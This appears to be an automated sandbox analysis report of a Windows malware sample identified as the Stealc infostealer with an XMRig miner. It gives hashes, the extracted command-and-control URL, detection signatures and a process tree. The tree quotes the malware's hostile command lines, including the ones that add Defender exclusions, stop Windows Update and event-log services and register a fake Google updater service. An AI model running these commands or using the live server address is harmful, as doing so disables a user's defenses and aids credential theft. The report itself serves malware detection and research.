Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 23-10-2024 10:36
Static task: static1
Behavioral task: behavioral1
  Sample: f33c7b978d078a797f2ee0d6d0783682.exe
  Resource: win7-20240729-en
Behavioral task: behavioral2
  Sample: f33c7b978d078a797f2ee0d6d0783682.exe
  Resource: win10v2004-20241007-en
General
Target: f33c7b978d078a797f2ee0d6d0783682.exe
Size: 382KB
MD5: f33c7b978d078a797f2ee0d6d0783682
SHA1: 83efd5987a1874bc00cbab51bbcbe00dba1f1b39
SHA256: 68137be68173e0258cabb670f93c1ce81669acd367119e268568d5781496ca61
SHA512: bcf4808d5d4af377b3e90e0ea09383465d26d99a354e87edcfe8967c712f1f98236e1789b14f5a3d64c77c69084587364dd7bc6b085833d29ab1ccd44f2e3fb1
SSDEEP: 3072:VUVF4fI95c1wYBcG9N8c8lk+J76sw30WF2ozwPAPnJOVGXagKW1ZJOTxx5P/u5ls:VqKwYBfnw5WFd9PEoZe/o7A4XXJ
Malware Config
Extracted
stealc
LogsDiller
http://185.201.252.118
url_path: /ef952bc0f542da4b.php
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | CGDGHCBGDH.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | updater.exe
XMRig Miner payload 18 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/1120-160-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-161-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-174-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-173-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-172-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-171-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-165-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-163-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-162-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-159-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-175-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-167-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-164-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-158-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-176-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-178-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-179-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
  behavioral2/memory/1120-180-0x0000000140000000-0x000000014082C000-memory.dmp | xmrig
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
  pid | process
  5108 | powershell.exe
  988 | powershell.exe
Creates new service(s) 2 TTPs
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\system32\drivers\etc\hosts | CGDGHCBGDH.exe
  File created | C:\Windows\system32\drivers\etc\hosts | updater.exe
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | CGDGHCBGDH.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | CGDGHCBGDH.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | updater.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | updater.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | f33c7b978d078a797f2ee0d6d0783682.exe
Executes dropped EXE 2 IoCs
Processes:
  pid | process
  3432 | CGDGHCBGDH.exe
  1432 | updater.exe
Loads dropped DLL 2 IoCs
Processes:
  pid | process
  3972 | f33c7b978d078a797f2ee0d6d0783682.exe
  3972 | f33c7b978d078a797f2ee0d6d0783682.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
  resource | yara_rule
  C:\ProgramData\CGDGHCBGDH.exe | themida
  behavioral2/memory/3432-84-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp | themida
  behavioral2/memory/3432-83-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp | themida
  behavioral2/memory/3432-87-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp | themida
  behavioral2/memory/3432-88-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp | themida
  behavioral2/memory/3432-91-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp | themida
  behavioral2/memory/3432-111-0x00007FF77F6C0000-0x00007FF7805EF000-memory.dmp | themida
  behavioral2/memory/1432-114-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp | themida
  behavioral2/memory/1432-115-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp | themida
  behavioral2/memory/1432-116-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp | themida
  behavioral2/memory/1432-117-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp | themida
  behavioral2/memory/1432-170-0x00007FF6476F0000-0x00007FF64861F000-memory.dmp | themida
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Checks whether UAC is enabled
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | CGDGHCBGDH.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | updater.exe
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
  pid | process
  4992 | powercfg.exe
  3308 | powercfg.exe
  2020 | powercfg.exe
  608 | powercfg.exe
  992 | powercfg.exe
  3924 | powercfg.exe
  5108 | powercfg.exe
  2236 | powercfg.exe
Drops file in System32 directory 4 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\MRT.exe | updater.exe
  File opened for modification | C:\Windows\system32\MRT.exe | CGDGHCBGDH.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
  pid | process
  3432 | CGDGHCBGDH.exe
  1432 | updater.exe
Suspicious use of SetThreadContext 2 IoCs
Processes:
  description | pid | process | target process
  PID 1432 set thread context of 4236 | 1432 | updater.exe | conhost.exe
  PID 1432 set thread context of 1120 | 1432 | updater.exe | explorer.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  2892 | sc.exe
  2612 | sc.exe
  4540 | sc.exe
  4052 | sc.exe
  4824 | sc.exe
  3864 | sc.exe
  2548 | sc.exe
  4860 | sc.exe
  1088 | sc.exe
  2128 | sc.exe
  3920 | sc.exe
  4600 | sc.exe
  2220 | sc.exe
  2268 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
Processes:
  pid | pid_target | process | target process
  384 | 3972 | WerFault.exe | f33c7b978d078a797f2ee0d6d0783682.exe
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | f33c7b978d078a797f2ee0d6d0783682.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | f33c7b978d078a797f2ee0d6d0783682.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | f33c7b978d078a797f2ee0d6d0783682.exe
Modifies data under HKEY_USERS 46 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 5108 | powershell.exe
  Token: SeShutdownPrivilege | 608 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 608 | powercfg.exe
  Token: SeShutdownPrivilege | 3308 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 3308 | powercfg.exe
  Token: SeShutdownPrivilege | 992 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 992 | powercfg.exe
  Token: SeShutdownPrivilege | 2020 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 2020 | powercfg.exe
  Token: SeDebugPrivilege | 988 | powershell.exe
  Token: SeShutdownPrivilege | 3924 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 3924 | powercfg.exe
  Token: SeShutdownPrivilege | 4992 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 4992 | powercfg.exe
  Token: SeShutdownPrivilege | 2236 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 2236 | powercfg.exe
  Token: SeShutdownPrivilege | 5108 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 5108 | powercfg.exe
  Token: SeLockMemoryPrivilege | 1120 | explorer.exe
Suspicious use of WriteProcessMemory 30 IoCs
Processes
[1] C:\Users\Admin\AppData\Local\Temp\f33c7b978d078a797f2ee0d6d0783682.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\f33c7b978d078a797f2ee0d6d0783682.exe"
    - Checks computer location settings
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 3972
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CGDGHCBGDH.exe"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 1660
    [3] C:\ProgramData\CGDGHCBGDH.exe
        command line: "C:\ProgramData\CGDGHCBGDH.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Drops file in Drivers directory
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Drops file in System32 directory
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        PID: 3432
      [4] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5108
      [4] C:\Windows\system32\cmd.exe
          command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          - Suspicious use of WriteProcessMemory
          PID: 756
        [5] C:\Windows\system32\wusa.exe
            command line: wusa /uninstall /kb:890830 /quiet /norestart
            PID: 2028
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe stop UsoSvc
          - Launches sc.exe
          PID: 4860
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
          - Launches sc.exe
          PID: 1088
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe stop wuauserv
          - Launches sc.exe
          PID: 4052
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe stop bits
          - Launches sc.exe
          PID: 4824
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe stop dosvc
          - Launches sc.exe
          PID: 2128
      [4] C:\Windows\system32\powercfg.exe
          command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          - Power Settings
          - Suspicious use of AdjustPrivilegeToken
          PID: 3308
      [4] C:\Windows\system32\powercfg.exe
          command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          - Power Settings
          - Suspicious use of AdjustPrivilegeToken
          PID: 992
      [4] C:\Windows\system32\powercfg.exe
          command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          - Power Settings
          - Suspicious use of AdjustPrivilegeToken
          PID: 608
      [4] C:\Windows\system32\powercfg.exe
          command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          - Power Settings
          - Suspicious use of AdjustPrivilegeToken
          PID: 2020
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          - Launches sc.exe
          PID: 3920
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          - Launches sc.exe
          PID: 2220
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe stop eventlog
          - Launches sc.exe
          PID: 2892
      [4] C:\Windows\system32\sc.exe
          command line: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          - Launches sc.exe
          PID: 4600
  [2] C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 2820
      - Program crash
      PID: 384
[1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3972 -ip 3972
    PID: 3088
[1] C:\ProgramData\Google\Chrome\updater.exe
    command line: C:\ProgramData\Google\Chrome\updater.exe
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 1432
  [2] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 988
  [2] C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      - Suspicious use of WriteProcessMemory
      PID: 4888
    [3] C:\Windows\system32\wusa.exe
        command line: wusa /uninstall /kb:890830 /quiet /norestart
        PID: 1828
  [2] C:\Windows\system32\sc.exe
      command line: C:\Windows\system32\sc.exe stop UsoSvc
      - Launches sc.exe
      PID: 3864
  [2] C:\Windows\system32\sc.exe
      command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
      - Launches sc.exe
      PID: 2612
  [2] C:\Windows\system32\sc.exe
      command line: C:\Windows\system32\sc.exe stop wuauserv
      - Launches sc.exe
      PID: 4540
  [2] C:\Windows\system32\sc.exe
      command line: C:\Windows\system32\sc.exe stop bits
      - Launches sc.exe
      PID: 2548
  [2] C:\Windows\system32\sc.exe
      command line: C:\Windows\system32\sc.exe stop dosvc
      - Launches sc.exe
      PID: 2268
  [2] C:\Windows\system32\powercfg.exe
      command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 3924
  [2] C:\Windows\system32\powercfg.exe
      command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 5108
  [2] C:\Windows\system32\powercfg.exe
      command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 2236
  [2] C:\Windows\system32\powercfg.exe
      command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 4992
  [2] C:\Windows\system32\conhost.exe
      command line: C:\Windows\system32\conhost.exe
      PID: 4236
  [2] C:\Windows\explorer.exe
      command line: explorer.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1120
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  System Services (2)
    Service Execution (2)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (4)
    Credentials In Files (4)
Downloads